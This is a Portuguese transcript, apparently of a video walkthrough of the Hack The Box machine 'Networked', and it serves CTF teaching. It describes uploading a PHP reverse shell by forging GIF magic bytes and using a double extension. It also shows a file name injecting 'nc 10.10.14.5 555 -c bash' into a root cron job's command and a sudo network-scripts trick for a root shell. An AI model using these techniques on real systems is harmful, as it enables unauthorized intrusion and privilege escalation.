E aí galera, aqui é o Bido e hoje a gente vai resolver a máquina Networked do Hack the Box, uma máquina Easy com sistema operacional Linux. Então bora lá, deixa eu abrir aqui já o nosso Notepad, anotar o nosso IP e começar o trabalho então. Rush Scan padrão de sempre, a gente já vê aqui porta 22 e porta 80 abertas, já dá para anotar. E bora lá. Porta 80 aberta, já vamos acessar ela aqui no navegador. Porta 22 normalmente não tem muito o que olhar. E vamos ver o que tem nesse site. Aqui ele basicamente não fala nada, é só uma mensagem aleatória. A gente dá uma olhadinha no source code. O upload e gallery ainda não estão linkados, então talvez tenha alguma coisa de galeria e de upload nesse site. Se a gente for enumerar, a gente já vê que é uma Apache 2.4.6 e também um PHP. Então já é uma dica para quando a gente for enumerar aí os diretórios, talvez colocar um PHP. Vamos ver se a gente pesquisar aqui index.php, se ele redireciona. Sim, redireciona não, né? Ele continua no index.php, mas é basicamente o mesmo site. Como output do RushScan não tem nada novo, traz a versão da página que a gente já enumerou e o PHP. CentOS talvez seja interessante, então se a gente for usar algum comando, a gente já pode voltar eles à distribuição, né, CentOS, Red Hat e afins. E ok, vamos rodar um GoBuster, que é onde a gente vai encontrar as coisas valiosas aqui. GoBuster de sempre, menos URL, menos W word list, eu uso a BigTXT por padrão, menos T30, pode ser até 40 aqui para ir um pouco mais rápido, e menos XPHP, porque como a gente já enumerou que ele é um site PHP, é sempre interessante a gente colocar esse tipo de extensão na hora de enumerar, certo? Porque se for enumerar um diretório, tu vai enumerar sem a extensão. Se tu for enumerar um arquivo, pode ser que tu enumere sem a extensão e ele redirecione, ou pode ser que não. Então, nesse caso aqui, provavelmente não. Por isso que é interessante colocar a extensão na enumeração de diretórios. E agora basta aguardar, porque aqui a gente vai encontrar algumas coisas interessantes. Já encontrou, na real, que é o barra backup, um dos diretórios interessantes, e a gente já pode ir acessando ele aqui. Vamos acessar o backup, então, e aqui a gente tem um backup.tar. Vamos acessar ele. Como vocês viram, baixou o backup 1 ali, porque eu já tinha baixado ele na minha máquina. Deixa eu copiar aqui o backup para o nosso diretório e extrair ele com o comando tar -xvf backup.tar. Aqui temos alguns arquivos, o index.php, lib.php, fotos.php e o upload. Como isso aqui é um source code, a gente pode abrir com o VS Code. Então, se você tem ele instalado na sua máquina, é só dar um code ponto. Se não tem, só pesquisar que é bem fácil de instalar ele. Mas pode abrir com qualquer outro leitor de texto também. Bom, aqui nesses arquivos a gente encontra o index.php que não tem nada de interessante. Esse fotos.php tem bastante código aqui, mas é basicamente para exibir as fotos que a gente vai fazer, o upload. Inclusive, obviamente, como a gente encontrou esses caras aqui, a gente já pode pesquisar se eles existem no site. Então, nesse caso, por exemplo, fotos.php. A gente consegue ver que é um lugar onde tem algumas fotos onde as fotos ficam armazenadas, né? Nesse caso aqui tem essas fotos aqui, que são as Rush Shells que eu previamente usei, eu esqueci de resetar a máquina para gravar o vídeo, mas enfim, né? Não vem ao caso. Para vocês vai estar só esses quatro aqui. Na real, eu vou até resetar a máquina rapidinho porque fica mais interessante mostrar tudo clean para vocês. Já volto. Bom, resetei ela aqui. Então as coisas devem estar clean agora. E o nosso GoBuster terminou já. A gente encontrou alguns diretórios interessantes. Sempre bom quando o GoBuster retorna bastante coisa. Um CGI bin, então não é normalmente tão interessante assim, só se tiver alguma Vuln Shell Shock e afins. O index.php normal, lib.php, que é o que a gente já tinha encontrado lá no backup. Fotos, PHP, upload PHP, então que também está aqui. E também o diretório uploads. O diretório uploads, a máquina não subiu 100% ainda. O diretório uploads, a gente tenta acessar e não consegue ver nada, né? Tem um pontinho aqui perdido. Bom, acessando fotos PHP, então a gente vê que aqui não tem nada interessante. Acessando o lib.php também não tem nada, não retorna nada. Até porque o lib ele é meio que um suporte aí, né? Um arquivo de suporte para o upload PHP, né? Dá pra ver aqui que o upload PHP está dando um require nesse lib aí. Então vamos entrar no upload PHP. E pelo próprio nome a gente já imagina o que seja. É um lugar onde a gente pode subir arquivos.
Primeira coisa que a gente tenta fazer quando vê um upload assim é tentar subir uma reverse shell em PHP. Então vamos passo a passo aqui, deixa eu copiar ela das minhas utilities que eu guardo aqui. Então PHP reverse shell. Vamos editar já. Colocar aqui o nosso endereço IP. E a porta pode ser a 1234 mesmo, sem problemas. Vamos tentar subir então. E se a gente der um go, ele dá invalid image file. Então deu imagem, né, arquivo de imagem inválido. Muito provável porque é um PHP. Se a gente der uma olhadinha aqui, a primeira coisa que a gente bate o olho já é que tem um array de extensões aqui, JPG, PNG, GIF e JPEG. Então a gente já pega aqui que aqui ele está fazendo uma validação como false e aqui ele muda essa validação para true caso o arquivo esteja dentro dessas extensões. Então o nosso arquivo provavelmente tem que terminar com esse cara aqui, né? Porque ele valida aqui, ó, provavelmente isso aqui é uma técnica do PHP para validar e comparar, né, se o arquivo finaliza com essas extensões, e é o caso que está fazendo aqui. Se finalizar, ele vai dar como true, se não finalizar, então se not valid, ele vai dar invalid image file, que foi o erro que a gente recebeu. Na real, a gente recebeu com ponto aqui, isso é uma dica muito boa, aqui não tem ponto, então o invalid image file que a gente recebeu foi esse, porque como a gente viu, são duas comparações que ele faz. Mas, então a gente foi barrado aqui primeiro por ordem do código, né, de cima para baixo, obviamente, mas se a gente vai passar se isso, a gente eventualmente ia cair nesse erro aqui e receber esse erro aqui. Beleza? E o que ele está fazendo aqui? Basicamente, primeiro, o mais fácil de ler aqui é que ele está comparando o arquivo o tamanho do arquivo, e ele tem que ser menor que 60.000 KB, se não me engano. E também checa o tipo do arquivo, né? Check file type, e isso ele puxa lá da lib.php. Como a gente pode ver aqui, tem o check file type, e esse file type basicamente está checando o type MIME do arquivo. O MIME é meio que referente aos magic bytes do arquivo, e o magic bytes é um headerzinho que basicamente identifica aquele tipo de arquivo. Como assim? Por exemplo, a gente sabe que o nosso PHP é um arquivo PHP, então se eu pesquisar aqui, né, com o Linux File, ele vê que é um arquivo de texto e um script PHP. A questão aqui é que como é que eu faço para ele identificar então que isso é um image, né? Porque ele quer identificar o tipo do arquivo e ver que é um image alguma coisa. É só eu inserir os magic bytes mentindo, né? Enganando aí, então, o leitor, né, que está lendo quais são esses magic bytes, induzindo ele a acreditar que isso é um GIF ou um PNG. Normalmente o pessoal usa GIF, que é o mais simples. Então eu venho aqui, edito esse arquivo, e eu posso colocar aqui, se não me engano é GIF 98 ponto e vírgula, algo assim. Deixa eu ver. Vamos tentar, file. Não. Talvez GIF 9 só. Também não. Só que ele já identificou que não é um script PHP, né? Mas enfim, deixa eu pesquisar. E a gente já aprende em tempo real. GIF Magic Bytes. Tá? Aqui ele tá GIF 87A. Talvez tenha que ser esse aqui, então. Opa. Não, no PHP. GIF 87A. E pronto. Agora a gente vê que esse arquivo agora está sendo compreendido como se fosse, né, pelos Magic Bytes, como um image. Tendo um image aqui dentro, a gente vai conseguir bypassar esse check file type, logo a gente vai conseguir bypassar essa validação aqui. E se o arquivo for menor que 60.000 bytes, e ele é sim, basta dar uma ls-la, que a gente vê aqui os kbytes, né, desse arquivo, 5.500. Aí a próxima bypass que a gente tem que dar, deixa eu só mostrar para vocês como o erro vai mudar agora e vai ser aquele sem ponto. Tentar subir e ó, já deu outro tipo de erro, certo? Até o próprio HTML é um pouco diferente, né? Um é pré e o outro é p. Ó, um é pré de não sei e o outro é p de parágrafo. Mas então só a gente fazer um bypass também simples de arbitrary file upload, de file upload, por isso que é muito bom você ter conhecimento disso. Se você não entende como fazer bypass de file upload, eu recomendo muito que você faça alguma run no TryHack, deve ter runs interessantíssimas sobre isso. Por isso que é sempre bom, né, ter esse conhecimento e não ir direto para o CTF.
Então agora basta a gente copiar, né? Eu vou copiar esse arquivo PHP Reverse Shell pelo mesmo nome e só vou terminar ele como JPG, que está dentro das extensões. E a gente vai conseguir bypassar isso aqui porque a única validação que ele faz é de fato isso. Ele não valida se tem alguma outra extensão, né? Nesse caso aqui é um bypass de double extension, que a gente chama. Então, a gente pode copiar. Só notem que às vezes o site não vai entender isso aqui como um PHP, um script PHP. Ele não vai executar como um PHP, ele vai executar como um JPG normal. Nesse caso aqui ele está usando um Apache, sem um Apache antigo e sem uma configuração correta. E por isso que o PHP acaba sendo executado mesmo que ele termine com .jpg. Então bora lá, deixa eu dar um browse aqui. Subir esse arquivo e dar um go. E agora a gente conseguiu fazer o upload. Se a gente ir lá no fotos.php, a gente tem aqui o PHP que a gente subiu. E para identificar, né, para executar ele, basta dar um inspect aqui e ver onde é que essa imagem está armazenada no site. Então dá um inspect aqui e aqui tem o caminho dela, ó, lá dentro de uploads. Mesmo que não tivesse aqui o caminho, daria para imaginar adaptando aqui, né? E lendo o lib.php, porque aqui ele pega o IP e tal e monta o nome do arquivo. Então por aqui daria para pressupor já que qual seria o diretório em questão e aonde estaria tá sendo feito o upload. Mas de qualquer forma a gente tem aqui de maneira fácil, então não vamos complicar a nossa vida também. Vamos abrir uma shell, né? Então netcat 1, 2, 3, 4. Deixa eu abrir desse lado aqui. E ver se tem execução do nosso arquivo. Enter. Já demorou um pouco para carregar. Então, a gente tem aqui a nossa shell. Conseguimos aí o nosso foothold. Vamos dar um export term igual xterm. O Python aqui que tem é o Python normal, não é o Python 3. Na real é o 3, só que não precisa especificar, né? Vamos melhorar nossa shell. E... será que é o Python 3 que tem? With Python 3. Ah não, ele melhorou de SH para Bash, né? Tá, show. Vamos dar um clear, dar um Ctrl Z. E agora temos uma shell boa. A gente está aqui como usuário Apache, então a gente precisa fazer um privesc. Vamos ver quem está lá no diretório home. E a gente tem o usuário GUI. Então aqui a gente consegue tentar ler o arquivo e a gente não consegue, permission denied. Mas tem esses arquivos aí que chamam a nossa atenção. Onados pelo root, né? Tem o checkattack.php e o crontab.gully. O crontab é sempre algo que chama a nossa atenção em questão de privesc. Então vamos dar um catch nesse cara e ver qual que é a boa. Basicamente isso aqui é um crontab, vou até anotar. Não estou anotando muita coisa. Opa. No nosso Launchpad, vou até anotar aqui que o crontab ele roda a cada 3 minutos, né? Basicamente é o que diz aqui. E ele chama com o PHP esse arquivo checkattack.php. Vamos ler o que o checkattack faz. E na real eu vou copiar aqui para o próprio source code aqui. Vamos criar um arquivo novo. É o checkattack.php. Para ficar melhor, né? Ficar colorido e dentado bonitinho. Bom, basicamente ele está dando o require do lib, ele está setando aqui um path como o path uploads, um log path com um arquivo temporário, aí ele mexe com two message headers, então provavelmente ele manda um e-mail, como dá para ver aqui embaixo. E que mais? Ele cria um array, aqui ele faz um grep escaneando os diretórios do path, então escaneando o diretório do uploads. E é por isso que é bom você ter conhecimento de entender pelo menos o básico de ler source code, né? Isso aqui não é nada complicado. Para quem é iniciante, a gente bate o olho e se assusta um pouco, mas tendo uma noção básica de lógica de programação, você vai eventualmente entender o que o código faz. Não precisa nem saber PHP em si. Tendo a lógica de programação, seja em Python, seja em C, etc., você consegue eventualmente entender o que o código está fazendo. Aqui, então, ele checa o nome e tem uma variável chamada value, que tá rolando um for each aqui, né, para cada arquivo dentro do diretório path, e daí está sendo atrelado nessa variável value. E aqui ele está checando alguma coisa, está checando se tem alguma coisa suspeita, provavelmente lá, né, com esse get name check, etc. Check IP. E basicamente se ele identifica que é um ataque, ele vai remover o arquivo logpath, que é o arquivo de log, vai remover o arquivo que é suspeito e também vai exibir qual que é esse arquivo.
Ok. A questão aqui, pessoal, é que esse comando exec sempre chama a nossa atenção, porque o comando exec no PHP é um comando que executa comandos de sistema. Essa variável logpath, como a gente não tem como alterar, porque ela é uma variável estática. Agora, essa variável path, a gente também não altera ela, porque ela é uma variável estática. Agora, a variável value, a gente consegue alterar, porque basicamente essa value é todo arquivo que está dentro desse path aqui, né? Porque ele está rolando um for each aqui e navegando entre aqueles arquivos. E, eventualmente, como a gente é o usuário Apache, a gente consegue criar arquivos dentro do HTML uploads, certo? Uploads. Logo, a gente consegue fazer aqui uma manipulação básica de command injection, que é a seguinte. A gente vê que está sendo executado um comando aqui, né? Deixa eu tentar explicar bem bonito para vocês aqui, para ficar legal essa parte do vídeo. É esse comando aqui que está rodando. Essa variável path, a gente sabe muito bem... Por que ele copiou isso aqui? Ah, tá. É do comando mesmo. Essa variável path, a gente sabe bem que é essa variável aqui. Então ele está dando um no-hup, que é basicamente um comandinho em Linux que executa processos em background, eu acho, ou algo assim, sem encerrar o terminal, ou sem um terminal, algo assim. Mas basicamente ele está removendo o arquivo, né, que está dentro aqui e o arquivo value. Então nesse caso aqui, né, ele vai passar pelo arquivo não sei o que lá, não sei o que. No caso, vai passar pelo arquivo index.html e ele vai ignorar, né, porque ele aqui ele já configurou isso. Vai passar pelo arquivo 127 não sei o que e vai ignorar também porque não vai remover porque não é um arquivo que ele considerou que não caiu aqui dentro, né? Mas basicamente quando ele encontrar alguma coisa que ele considere suspeito, ele vai passar por aqui e vai executar então o comandinho, seja lá, arquivo, vamos dizer que esse velho aqui arquivo suspeito .php. Provavelmente tudo que é .php apenas ele remove, né? Então, o que a gente pode fazer aqui? Usar do próprio linha de terminal do Linux e fazer o seguinte. Até aqui a gente não consegue controlar. A partir daqui a gente consegue, criando o nome do arquivo. Então, basta a gente criar um arquivo com o nome, com o comando que a gente quer. Nesse caso aqui, o comando que a gente quer é qual? É que quebre esse comando aqui. Então, para quebrar um comando, para terminar ele e para executar mais um comando na mesma linha, com Linux, a gente usa o ponto e vírgula, né? Por exemplo, se eu quero dar dois comandos em sequência, o id e o whoami, eu faço assim, ó, id, ponto e vírgula, whoami, e eles vão ser executados juntos na mesma linha. Então, por isso que a gente vai criar um arquivinho chamado ponto e vírgula. Então, a nossa variável value vai ser o nome do nosso arquivo que vai ser ponto e vírgula. E o comando que a gente quer. Então, sei lá, cat home gully.use.txt e a gente vai dar um cat nesse arquivo aqui. Entendeu? Então, a gente vai criar um arquivo com esse nome e o novo comando que vai ser executado quando for executado vai ser este cara aqui. Maravilha? Nesse caso a gente pode já jogar aí uma reverse shell para nós, beleza? Então vamos criar o arquivo, a gente pode criar o arquivo com o comando touch, aí é sempre bom abrir aspas, ainda mais quando a gente vai criar arquivos com nomes estranhos, que nem o que a gente vai criar aqui é com ponto e vírgula, e a gente pode usar o próprio netcat, então netcat 10.10.14.5, vamos jogar na porta 555, "-c bash". Por que "-c"? Normalmente eu uso "-e". Essa máquina não aceita bem o "-e". Deixa eu dar um exemplo para vocês. Deixa eu abrir aqui no 555. E, enfim, você vai identificar isso testando, né? As reverse shells. Porque é sempre bom você testar a reverse shell antes de jogar ela no Chrome Tab e ficar esperando. Né? Testa no próprio usuário que você tem. Então, se eu jogar com "-e", percebam que a shell não se mantém, ó. Ela crasha por algum motivo. Se você jogar com o "-c", acho que eu falei "-c" antes, né? "-e" ela crasha. E "-c", no caso eu não abri aqui, ela não crasha. Enfim, tem essas flags, elas são um pouco diferentes no próprio netcat. Uma acho que ela executa um arquivo, nesse caso está executando bash, e outra é um comando. Mas nesse caso, o mais aceito nessa máquina é a "-c", por algum motivo peculiar da própria máquina, certo? Então por isso que eu recomendo você usar o "-c" aqui para criar o arquivo. Então vamos criar o arquivo lá. Vamos fechar as aspas simples aqui. Vamos ver se o nosso arquivo foi criado. Foi. E agora é só abrir o listener. Infelizmente são 3 minutos, né? Podiam colocar 1 minuto para o padrão no Chrome Tab, mas ok. E, bom, agora basta aguardar. Espero que você tenha entendido que o comando que vai ser executado agora vai ser esse cara aqui, ponto e vírgula, e esse cara aqui que a gente colocou. Beleza? Assim que executar a reverse shell, eu já volto com vocês, porque, enfim, né? 3 minutinhos aí aguardando agora. Bom, aguardei um pouco. Parece que é sempre mais que 3 minutos, a gente fica ansioso esperando a máquina.
responder. Mas por isso que é a importância de usar o menos V aqui, pessoal. Se não tivesse o menos V, a gente não ia ver se conecta alguma coisa e não ia nem perceber que teve uma shell, né? Porque ele não abre nenhum TTY aqui, nenhum terminal, etc. Então por isso que a gente sempre usa esse menos V aqui quando está subindo um listener. A gente é o usuário aqui, vamos padrão de sempre, melhorar a shell. E legal. Essa por enquanto é uma das máquinas mais divertidas que eu fiz do Hack the Box como Easy. É... Python. Ah, eu não fechei o aspas. Falta fechar aqui o. As aspas simples. Export term igual xterm. Clear. Ctrl Z. Show. Deixa eu puxar pra cá. A gente é usuário agora. Consegue ler aí a user flag. Sudo "-l", privesc, sempre o padrão, né? Dá o sudo "-l", e aqui a gente consegue ver que consegue executar como root esse tal de changename.sh. Lendo esse arquivo aqui, primeira vez que eu bati o olho aqui, eu já pensei, pô, deve ser alguma coisa de path, né? De path hijacking. Mas como dá pra ver aqui, o path ele tá seguro, então você não consegue fugir desse path aqui, logo não é algo a respeito de path hijacking. Vou dar um cat nesse arquivo e ler o que ele faz. Basicamente ele mexe com algumas configurações de rede e de scripts de rede e afins. E se a gente só executar o arquivo, a gente vê que ele mexe com de fato com uma configuração de rede, a interface name e coisas assim, método de proxy e tal, e acaba dando um erro a respeito disso. A questão aqui, pessoal, é que agora é pesquisa, tá? O que a gente teria que fazer? Não era para dar isso, era para dar um catch. A gente tem informação que consegue executar esse arquivo. Se você pesquisar sudo "-l", sudo "-l" isso aqui, provavelmente você vai achar somente o write-up do desafio. A questão é que você tem que pegar as manhas. A gente está num CentOS, como a gente tinha anotado, certo? Então a gente já sabe que é uma distribuição aí Red Hat alike, e ele mexe com network script, certo? Então com coisa de rede, com interface de rede. O que a gente pode pesquisar aqui para achar, né, o exploit que de fato tem que ser encontrado? Algo como CentOS, no caso aqui já apareceu para mim, né, porque eu já tinha acessado. Mas CentOS exploit network scripts. E aqui apareceria para você. É muito mais difícil, né? Eu já tinha conhecimento disso, mostrando agora para vocês, mas é basicamente isso, cara. Pesquisa as informações que tu tem, nesse caso Network Script, que é um CentOS, que tu tem permissão de sudo, que eventualmente tu vai encontrar o exploit. Até porque não é um arquivo muito comum de você ter permissão, então dá pra ver que era algo mais específico, certo? E aqui, basicamente, eu não sei se tem o nome do autor aqui, mas ele demonstra que tem uma vuln no Red Hat no CentOS que a própria Red Hat não considerou como vulnerabilidade isso, se não me engano, que no momento que você está configurando aqui, como a gente conseguiu ver, a gente seta algumas variáveis. Então aqui, por exemplo, interface name, a gente está setando uma variável. Aqui interface proxy model também, interface. A questão é que se você vai setar uma variável no Linux, você seta assim, né? Vamos pegar aqui, o path não, né? Vamos setar uma variável bido igual a 123, certo? Funciona assim, se dá export? Oh meu Deus, que mania de ter o path. Testando aqui com vocês em tempo real. Beleza. A questão é que se você dá um bido igual a 1, 2, 3 e depois dá um comando, o comando vai ser executado. Você está a variável e o comando vai ser executado. Logo, o que a gente pode fazer aqui é declarar o nome da variável. Então, nesse caso aqui da browser only, eu vou declarar como oi, oi, oi. Então, está setando browser only, então ele está fazendo isso aqui, ó. Browser only igual a oi, oi, oi. E em seguida vai executar o who am I, entendeu? Então basta dar um bash. Que como eu estou executando isso como root, quando a configuração terminar, eu vou pegar aí e executar um bash como root. Simples assim. Legal, né? Então pode dar um wc aqui no root.txt. E esse é o Privilege Escalation. Essa maquininha eu achei fenomenal. Ela realmente é easy barra medium, se não até medium, eu diria. Para os níveis atuais das máquinas de hoje do Hackbox, ela é easy, sim, mas para a época que ela foi lançada, dá para ver que a própria votação dela
tem bastante votação como medium, certo? Se fosse uma máquina mais atual, provavelmente ela teria mais ISIS. Mas é bem interessante porque envolve análise de source code, uma tática de privacy que você tem que pesquisar para achar ela. Se você não pesquisar, você não vai saber provavelmente como explorar. Qual que é o segundo privacy? Um privacy que envolve com tab também, com command injection. Então, muito legal. Qualquer dúvida que vocês tiverem, podem mandar aqui no YouTube ou me chamar no LinkedIn, certo? Muito obrigado por assistir até aqui e valeu, falou!